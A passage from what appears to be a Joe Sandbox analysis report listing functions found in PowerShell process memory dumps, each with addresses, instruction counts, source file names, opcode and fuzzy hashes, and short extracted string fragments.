                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c24fb042ec585c789c5610ba4ec88e0ee674325c19522e82863639864cdce676
                    • Instruction ID: f2a26191705d336dd2bbfdb5ea21c3e38c94168282cc287dbf551158b80590cc
                    • Opcode Fuzzy Hash: c24fb042ec585c789c5610ba4ec88e0ee674325c19522e82863639864cdce676
                    • Instruction Fuzzy Hash: 035114A7B0D7E61AE752562D58B60E92FA4DF9326570910F7C6C4CF0A3ED0C184BA362
                    Function 00007FFD346F6E6D Relevance: .1, Instructions: 143COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4d895d74987b50862ae06befe8a295c8c1eff8351b663089df179e2cf2a92d6
                    • Instruction ID: aaffddaa0c9b5d8aa5f80b08be7c21fc8e770e30e06b9aa3c3d0034cd8864a91
                    • Opcode Fuzzy Hash: f4d895d74987b50862ae06befe8a295c8c1eff8351b663089df179e2cf2a92d6
                    • Instruction Fuzzy Hash: 6F415557B4E7E21EE613963D98B61DA3F649E9312570940FBC6C4CB0E3DD1C580BA3A2
                    Function 00007FFD346F3E33 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6b35349e7cad6ebb6a1f2395de4e2a54f72b1a21a943a7d94310ecaab733848
                    • Instruction ID: 6635394b9c8f81a5544e7e925e4db7eeaeb839b96cae3fbee955164acb842f8a
                    • Opcode Fuzzy Hash: f6b35349e7cad6ebb6a1f2395de4e2a54f72b1a21a943a7d94310ecaab733848
                    • Instruction Fuzzy Hash: 6B316FB7B0D2A21FF3169A6C98B64DA3BA4DF9326430A01B7C6C4CB093D91C18479661

                    Executed Functions

                    Function 04EAF1F0 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e2c05395068e4fca6a3e1b7481fe083793d34ba737a0c0c3808bc482e8de05f8
                    • Instruction ID: c7d873491a3c19d6bc69f4328f28e62fc8ee50dcd4936ed8370e32e0815b9ef3
                    • Opcode Fuzzy Hash: e2c05395068e4fca6a3e1b7481fe083793d34ba737a0c0c3808bc482e8de05f8
                    • Instruction Fuzzy Hash: 29B16D70E00209CFDF10CFA9D8857EEBBF2AF88308F149529D815AB254EB74B855CB95
                    Function 04EAFAC0 Relevance: .3, Instructions: 266COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6409f22fb08c0b14467f5d47850d4f74a90807991645922ad0421a9949bc3571
                    • Instruction ID: a5d812f7d3f0c1e9b8ea8705516ac487ba6fc5413303f6fbd07286f4826c4322
                    • Opcode Fuzzy Hash: 6409f22fb08c0b14467f5d47850d4f74a90807991645922ad0421a9949bc3571
                    • Instruction Fuzzy Hash: 7BB17C70E00209CFDB14CFA9D8957DDBBF2AF88318F149529D815EB254EB74B855CB81
                    Function 04EA9AD9 Relevance: .1, Instructions: 117COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64b229f07017db13b54caadcc5f68902282f3dafae8a22884998f0593563542a
                    • Instruction ID: 28bcb3572e0cc9d9b4d16985f6c9b022eb5b3fd8d13dae0ede33de63fc2c59b3
                    • Opcode Fuzzy Hash: 64b229f07017db13b54caadcc5f68902282f3dafae8a22884998f0593563542a
                    • Instruction Fuzzy Hash: 3D418A71B006148FDB19DF74C4A8AAABBF2EF89714F15546CE402EB7A1CB38AC41CB50
                    Function 07BE64C8 Relevance: 9.8, Strings: 7, Instructions: 1099COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl$(fbl$Xl$Xl
                    • API String ID: 0-2251029069
                    • Opcode ID: 4aa0468332f5679e063243e03ccb767aaa4de3591a4341f0ff7afb161eadedc2
                    • Instruction ID: df8a100dbd9e65e3b1277e889f6f968734c76482b5a379a57ec3cb743a84fd5a
                    • Opcode Fuzzy Hash: 4aa0468332f5679e063243e03ccb767aaa4de3591a4341f0ff7afb161eadedc2
                    • Instruction Fuzzy Hash: 3E929CB5B00205DFEB14CF58C855BAABBF2EB8A304F1480A9E9199F351DB72DC42CB51
                    Function 07BE7FBB Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$x.Sk$x.Sk$-Sk
                    • API String ID: 0-238166978
                    • Opcode ID: 4e1cfbc03c7c3ab5e0cbeee55bbdcd57d31d7828612c69748fd41a6839d14a65
                    • Instruction ID: d372988e9b4cec4756f9d10571b3443e04e82a962151bec3f9c70145594a4111
                    • Opcode Fuzzy Hash: 4e1cfbc03c7c3ab5e0cbeee55bbdcd57d31d7828612c69748fd41a6839d14a65
                    • Instruction Fuzzy Hash: 24F161B4A00215DFEB24DB64C851BAEB7F2AF85300F1080E9D6196F791DB76ED818F91
                    Function 07BE60C0 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl$x.Sk
                    • API String ID: 0-3552306660
                    • Opcode ID: 9297e0868e2fc8f06662d3272a9d52fd574858c1b441ce42bdb9d8290ab3c5e3
                    • Instruction ID: a709fff3d4598effbdc79fd00475e8575c8af65bb6c94b08d7f5279ba72bb553
                    • Opcode Fuzzy Hash: 9297e0868e2fc8f06662d3272a9d52fd574858c1b441ce42bdb9d8290ab3c5e3
                    • Instruction Fuzzy Hash: 41B18DF1B00205DBEB14CB68C455BAEB7F3EB99308F1480A9E905AB755CB76EC418F91
                    Function 07BE7940 Relevance: 5.8, Strings: 4, Instructions: 791COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x.Sk$x.Sk$-Sk$-Sk
                    • API String ID: 0-2226652981
                    • Opcode ID: cd582345792c9b55a70e23b115d957e386b0fa91904674662fb3660fd09ffab2
                    • Instruction ID: 2a878a417107b5790e441ba2d7cdd88251ef77f70cd75c2e9baeea4ee014f540
                    • Opcode Fuzzy Hash: cd582345792c9b55a70e23b115d957e386b0fa91904674662fb3660fd09ffab2
                    • Instruction Fuzzy Hash: BC625CB4A00215DFEB24CF68C855BAEB7B2EF89300F1080A9D5196F395CB76ED418F91
                    Function 07BE684C Relevance: 4.4, Strings: 3, Instructions: 641COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$Xl
                    • API String ID: 0-2562675214
                    • Opcode ID: f46754c3cc6ab2ffe7ff7c12e6c1db461d9f72bccf38e96c5585206a20cbdcf6
                    • Instruction ID: f5e99ae9108675b222d72abc6d35983cef4d30ee2ab2b8cb47b7df7150ea41bf
                    • Opcode Fuzzy Hash: f46754c3cc6ab2ffe7ff7c12e6c1db461d9f72bccf38e96c5585206a20cbdcf6
                    • Instruction Fuzzy Hash: 704228B5A00205DFEB14CB58C541BAAB7F2EB8A304F14C0A9E9199F756CB72ED42CF41
                    Function 07BE6860 Relevance: 4.4, Strings: 3, Instructions: 635COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$Xl
                    • API String ID: 0-2562675214
                    • Opcode ID: 969bdf2d5532d442dfc3eb2337618f615b75c6a1479483bc0dd295b1befd4c24
                    • Instruction ID: b355892eff3d76bc5cb50a7e10e0329cc61bf32f50b160780bb035019bf78fbe
                    • Opcode Fuzzy Hash: 969bdf2d5532d442dfc3eb2337618f615b75c6a1479483bc0dd295b1befd4c24
                    • Instruction Fuzzy Hash: 684228B5A00205DFEB14CB58C545BAAB7F2EB8A304F14C0A9E9199F756CB72ED42CF41
                    Function 07BE85AB Relevance: 4.2, Strings: 3, Instructions: 446COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$x.Sk$-Sk
                    • API String ID: 0-62482933
                    • Opcode ID: 89f08106ac9f585502ef2fd6c0aa13b21df256059f152fda33048e0e3e28c636
                    • Instruction ID: f8b88a773d88cd06a22fbab0dc6649a23da541c2449d008d17c57f5ba91a9d9c
                    • Opcode Fuzzy Hash: 89f08106ac9f585502ef2fd6c0aa13b21df256059f152fda33048e0e3e28c636
                    • Instruction Fuzzy Hash: EE026EB4A00205DFEB14CB58C951BAAB7B2EF89304F14D0A9D9196F395CB76EC81CF91
                    Function 07BE60A0 Relevance: 4.0, Strings: 3, Instructions: 250COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$x.Sk
                    • API String ID: 0-4141647896
                    • Opcode ID: 19c563cb400d2dc2e23ee83dbbda6c0d1a02ccec8a14ca089b60e5d301240513
                    • Instruction ID: 6d0bafceeccea9c91918e51ecf1ae6740cb657f047f6be2736dc170399cec11f
                    • Opcode Fuzzy Hash: 19c563cb400d2dc2e23ee83dbbda6c0d1a02ccec8a14ca089b60e5d301240513
                    • Instruction Fuzzy Hash: 3DA18FF1A002059FEB14CB68C455BAEBBF2EF99308F1480A9E5046B756CB76EC41CF51
                    Function 07BE7149 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl
                    • API String ID: 0-2766770709
                    • Opcode ID: ac35e5d09692b79f89114ac5c5c1e6450534e893a8761af432cd1f81c63af093
                    • Instruction ID: 2b5d73331145d9ad14c1d207206b49d9abdfb5d6257b8321ff7c430029439e43
                    • Opcode Fuzzy Hash: ac35e5d09692b79f89114ac5c5c1e6450534e893a8761af432cd1f81c63af093
                    • Instruction Fuzzy Hash: 6C1238B5A00205DFEB14CF58C941BAAB7F6EB86304F14C0A9E9199F752DB72ED42CB41
                    Function 07BE8990 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x.Sk$-Sk
                    • API String ID: 0-1654664905
                    • Opcode ID: 8dac64a4267b3086169bbfe50a4edd250e942bd392c3d03c3c91f1bc457f6448
                    • Instruction ID: 77df51bd48f5825fbcd80cac7ceac3003c92def15de98e58ab0a365efce3c183
                    • Opcode Fuzzy Hash: 8dac64a4267b3086169bbfe50a4edd250e942bd392c3d03c3c91f1bc457f6448
                    • Instruction Fuzzy Hash: 25A18AB4A01605DBEB14CF64C540BAEB7B2EF89304F14D0A9D5156F395CB76E882CF91
                    Function 07BE44EC Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 84`l
                    • API String ID: 0-373294282
                    • Opcode ID: 185635311faf84e5e40ca2a475775be320f972cbf1de34e255cc49d9d0d425d4
                    • Instruction ID: ae9ec8e8d0948a486f4e4dc465cebda5bd4468c840f065e8baef37544d0eac00
                    • Opcode Fuzzy Hash: 185635311faf84e5e40ca2a475775be320f972cbf1de34e255cc49d9d0d425d4
                    • Instruction Fuzzy Hash: 3651D3B0A093C29FD7228B64C811A16BFF1EF87215F19C4DBE8848F292C721CC46C751
                    Function 04EABB00 Relevance: .5, Instructions: 516COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae1504ea33172a2cb08872f4bd2e3f16a5ab524f56c34cdfd83f73ad63a45a82
                    • Instruction ID: 972fec396f8b4acfd91217c15652597bdcb2b6bb6e0fdd3b72e2ef18cb040252
                    • Opcode Fuzzy Hash: ae1504ea33172a2cb08872f4bd2e3f16a5ab524f56c34cdfd83f73ad63a45a82
                    • Instruction Fuzzy Hash: 4F225F34B002149FDB29DB34D8547AEBBB2BF89304F1454A9D50AAF361DB35AE91CF81
                    Function 07BE9230 Relevance: .5, Instructions: 489COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5c334bada7c662c2583137d566c93d445c188622e0b88c123cddccbd15e9b871
                    • Instruction ID: 99308e1da6dca1581e3a4eece0ba1b284d9518fae34ed8f0e48b85560d9d87ae
                    • Opcode Fuzzy Hash: 5c334bada7c662c2583137d566c93d445c188622e0b88c123cddccbd15e9b871
                    • Instruction Fuzzy Hash: F2F116F1B04306CFEB249E6984146BABBEAEFC6211B1480FBD515CB351DB35E909C762
                    Function 04EA4EA8 Relevance: .3, Instructions: 331COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b332581ebbc5b3362b84210d83c58c96f0bb0df1304141c456de378ecd22056a
                    • Instruction ID: 0e1d73b6c9e7ff51ebd1696bce3f918fd84f8da3c46e2dbb48a5d2b9bc7d9cbb
                    • Opcode Fuzzy Hash: b332581ebbc5b3362b84210d83c58c96f0bb0df1304141c456de378ecd22056a
                    • Instruction Fuzzy Hash: 89D13B34A00208EFDB05CFA8D494A9DBBB2FF89314F249559E845AB361D775FD82CB90
                    Function 04EA45C0 Relevance: .3, Instructions: 321COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed924b651de98da365b9264e38a0f5a48434856c400254fdec548db0b877b117
                    • Instruction ID: 3e90ef173709fa16f86378d95024ff7a74c77586f8710b7f48f14f531d1a7c81
                    • Opcode Fuzzy Hash: ed924b651de98da365b9264e38a0f5a48434856c400254fdec548db0b877b117
                    • Instruction Fuzzy Hash: 12D1F534A00219DFDB14CF98D494AADBBF2FF89314F289559E804AB365C771ED92CB90
                    Function 04EA9580 Relevance: .3, Instructions: 319COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 960fc8750931430f91fa7f91c31e81fd5fbee6658843f19a6dea9742491e995a
                    • Instruction ID: d392bee2cca1b10ab38c850ac26c805d6a2f6ee876ce720c21415b3eef3b58af
                    • Opcode Fuzzy Hash: 960fc8750931430f91fa7f91c31e81fd5fbee6658843f19a6dea9742491e995a
                    • Instruction Fuzzy Hash: 3AC1BE75A002089FDB14DFA8D444AADBBF2FF85304F158969E406AF266DB34FD59CB80
                    Function 07BE98B0 Relevance: .3, Instructions: 282COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01a72d0f60b646706821021c9f9c7301c94988d14cf70eae4dda92dc4099369b
                    • Instruction ID: 8a507e61f639064f189ed7386ed23de8534c0b3eb0627597aaf7691fc804a97e
                    • Opcode Fuzzy Hash: 01a72d0f60b646706821021c9f9c7301c94988d14cf70eae4dda92dc4099369b
                    • Instruction Fuzzy Hash: C69127F1704306DFEB148B74885476A77EAAF86200F1480EAD546CB395DB36E849CB52
                    Function 04EAF1EE Relevance: .3, Instructions: 274COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 637f9c69fa17684b1acd370e4e713838a6efbb56be36a3414215cb36b8154fd7
                    • Instruction ID: 61413a86786741e74f59e3e03b5fc583e507c7ff3410e9c8a23eb42b05e0c275
                    • Opcode Fuzzy Hash: 637f9c69fa17684b1acd370e4e713838a6efbb56be36a3414215cb36b8154fd7
                    • Instruction Fuzzy Hash: D1B17D70E00209DFDF10CFA9C8857EEBBF2AF88308F149529D815AB254EB34B855CB95
                    Function 04EAFAB4 Relevance: .3, Instructions: 265COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a2b212d007e5635d0d840c6fbbc600b453570de0f88c582925ded34558063ed6
                    • Instruction ID: e93b688538e311dc2a2f9b03c6de785cf3dfac1ff4603f5d678e212e7503d355
                    • Opcode Fuzzy Hash: a2b212d007e5635d0d840c6fbbc600b453570de0f88c582925ded34558063ed6
                    • Instruction Fuzzy Hash: E2B17C70E00209CFDB10CFA9D8957DDBBF2AF88318F149529E819EB254EB74B855CB91
                    Function 04EA2B48 Relevance: .2, Instructions: 215COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 13ff40d0004e242884a069fa726f3638c5d6aa3fecb054bdf6a6a36222e00910
                    • Instruction ID: 2bd3f5b22fc730ba17a9c94948da7d3d558911efee94e15759458200fdc5b238
                    • Opcode Fuzzy Hash: 13ff40d0004e242884a069fa726f3638c5d6aa3fecb054bdf6a6a36222e00910
                    • Instruction Fuzzy Hash: 0891BE74A00605CFCB05CF59C494AAEFBB1FF88314B2586A9D655AB3A5C335FC51CBA0
                    Function 07BE4138 Relevance: .2, Instructions: 204COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 486a5ab62659c2b108d6b44dbdc67b8dbe4058ea53dd8cdf914b4c23d62c0873
                    • Instruction ID: 83e52d7e764f39cb23619e27dd999b91e5ff18511952877edf5282dea75d620f
                    • Opcode Fuzzy Hash: 486a5ab62659c2b108d6b44dbdc67b8dbe4058ea53dd8cdf914b4c23d62c0873
                    • Instruction Fuzzy Hash: 8F6129F1604386DFEB258F69C85076ABBBAEF82210F2480E7E814CB355C735C845C752
                    Function 04EA8DE8 Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e0787ab7398c8e891edca58d35df010454bc6c1f1083cddac35e4a0802ee5b6a
                    • Instruction ID: 908d42a987e3c74a2edd1203a88297caf52817c57495922debc7c4c5be1e058b
                    • Opcode Fuzzy Hash: e0787ab7398c8e891edca58d35df010454bc6c1f1083cddac35e4a0802ee5b6a
                    • Instruction Fuzzy Hash: 9A716934A01205DFCB15DFA8D8849AEBBF2FF89314F1584AAE405AB262D735EC42CB50
                    Function 04EA9D48 Relevance: .2, Instructions: 190COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 988c501b08e9232df0eb47d52c7b55a608d97bcf967394976a396053d132119c
                    • Instruction ID: e9c341f2ac0b9d414dc3d9c3edcb1aab6e5cc9ea7d0fd17c2c8ccd79c48c2e2e
                    • Opcode Fuzzy Hash: 988c501b08e9232df0eb47d52c7b55a608d97bcf967394976a396053d132119c
                    • Instruction Fuzzy Hash: DC719C70A00209DFCB14DF68D894AAEBBF2FF85314F148969E4559B352DB75BC46CB80
                    Function 04EA9EB6 Relevance: .2, Instructions: 188COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e3d036bee6baa41bce5ac3788eb24d7426300d7b93e64ec394b5e01f7e219cb3
                    • Instruction ID: d8279d5d322cf77c188c78164b73e567be581ed429940511d3849fdb0f36f9c5
                    • Opcode Fuzzy Hash: e3d036bee6baa41bce5ac3788eb24d7426300d7b93e64ec394b5e01f7e219cb3
                    • Instruction Fuzzy Hash: 03713C74A00209DFDB15DFB4D490BAEBBF2BF88308F148829D412AB261DB75BC46CB50
                    Function 07BE9894 Relevance: .1, Instructions: 144COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1bc363499bc930e7fc2a0ec76b6af70b8a999fc2825ebd013e956886143af2ef
                    • Instruction ID: 74f37b5b14cd55bbb744ed74df56ff3ac98f78c5e9741048f2d4c14181c8e9f8
                    • Opcode Fuzzy Hash: 1bc363499bc930e7fc2a0ec76b6af70b8a999fc2825ebd013e956886143af2ef
                    • Instruction Fuzzy Hash: C34123F0B04202DFEB248F248594BBA77EAEF85340F1480E9D8459B355D736E948CB63
                    Function 04EA9D33 Relevance: .1, Instructions: 144COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3aa0147c8e200b649ce86078069f7dcf8c6b9757564dbabf72e3cf98b0211c8c
                    • Instruction ID: 693c4fb89330941294d0ba872fd6489d3383e5acacb5d826a5c34fda7beb90f5
                    • Opcode Fuzzy Hash: 3aa0147c8e200b649ce86078069f7dcf8c6b9757564dbabf72e3cf98b0211c8c
                    • Instruction Fuzzy Hash: 24511770A006099FDB19DFA4D8946AEBBF2FF89308F15982DD006AB291DB75AC45CB50
                    Function 07BEB175 Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f16fd8edabc76cca1d938921181a5bf87e6ba955840373320ad464071539ca07
                    • Instruction ID: 4cf997c782ea4ac7e1adde38aeab6e0402bfc3b48289363bb944d9fae95a9183
                    • Opcode Fuzzy Hash: f16fd8edabc76cca1d938921181a5bf87e6ba955840373320ad464071539ca07
                    • Instruction Fuzzy Hash: FF416AF27002919BFB159BB49411EAFBF96DFC2225B1480EAD5518F341DB318911C7A2
                    Function 04EA3964 Relevance: .1, Instructions: 109COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
